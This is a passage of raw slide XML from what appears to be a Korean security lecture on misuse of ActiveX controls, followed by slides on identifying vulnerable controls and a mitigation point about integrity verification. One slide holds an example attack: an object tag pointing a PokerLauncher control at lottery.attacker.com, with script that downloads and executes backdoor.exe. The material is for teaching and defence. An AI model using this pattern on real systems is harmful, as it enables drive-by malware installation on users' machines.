          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>backdoor.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22534" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4418006" y="1779588"/>
            <a:ext cx="3214710" cy="720725"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33304"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1"/>
              <a:t>Request backdoor.zip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4418006" y="2917755"/>
            <a:ext cx="3000396" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33333"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="10799999" rev="0"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr">
            <a:flatTx/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1"/>
              <a:t>backdoor.zip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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25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4" grpId="0" animBg="1"/>
      <p:bldP spid="12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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AD18D033-875F-4569-B9E4-6E3CF301A5D4}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555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ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Potential Misuse of ActiveX Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23556" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23557" name="Picture 10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gray">
          <a:xfrm>
            <a:off x="488916" y="1636713"/>
            <a:ext cx="2571750" cy="20701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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3060684" y="3780631"/>
            <a:ext cx="714380" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33333"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="10800000" rev="5400000"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr">
            <a:flatTx/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" noProof="1"/>
              <a:t>Execute backdoor.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23564" name="Picture 5" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\7BPRR1SS\MCBD06551_0000[1].wm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060575" y="4638675"/>
            <a:ext cx="2673350" cy="218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65" name="Picture 3" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\81YR0P6F\MCj02825920000[1].wmf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418388" y="1493838"/>
            <a:ext cx="3214687" cy="2287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1" name="그룹 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5489576" y="4352135"/>
            <a:ext cx="4857785" cy="2571769"/>
            <a:chOff x="4275130" y="3494878"/>
            <a:chExt cx="5429289" cy="1071571"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="모서리가 둥근 직사각형 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4275130" y="3494878"/>
              <a:ext cx="5429289" cy="1071571"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="non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ko-KR" altLang="en-US" sz="2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굴림" pitchFamily="50" charset="-127"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="직사각형 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4275130" y="3566316"/>
              <a:ext cx="5346701" cy="884858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algn="l" eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0" smtClean="0"/>
                <a:t>Software developer must implement ActiveX control so that downloaded files are always subject to </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>integrity verification </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0" smtClean="0"/>
                <a:t>and only </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>intended processes</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0" smtClean="0"/>
                <a:t> are able to be executed</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="그룹 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2984626" y="1967812"/>
            <a:ext cx="1361942" cy="1741381"/>
            <a:chOff x="2900129" y="1967812"/>
            <a:chExt cx="1361942" cy="1741381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Picture 13" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\NOBCR1O3\MCj02899620000[1].wmf"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads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2905118" y="1967812"/>
              <a:ext cx="1356953" cy="16818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4" name="TextBox 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2900129" y="3432194"/>
              <a:ext cx="1303563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ko-KR" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PokerLauncher</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="직사각형 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="488950" y="1993900"/>
            <a:ext cx="2928924" cy="1631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en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;object id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>="PokerLauncher" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>="…….</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   &lt;param name="Server" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>      value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://lottery.attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>backdoor.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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35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1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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F7B86B74-4B37-41CD-9F99-D17F1FC725AA}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579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ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>2 Potentially Vulnerable ActiveX Control Identification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580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/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24581" name="AutoShape 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="1954213"/>
            <a:ext cx="5446712" cy="441325"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449337" tIns="45654" rIns="91306" bIns="45654" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Introduction to ActiveX Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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24582" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2397125" y="2889250"/>
            <a:ext cx="6407150" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12796"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="475E76"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="99CCFF"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="475E76"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Potentially Vulnerable Control Identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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958470" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="1809750"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="958471" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1889125" y="2733675"/>
            <a:ext cx="801688" cy="757238"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24586" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
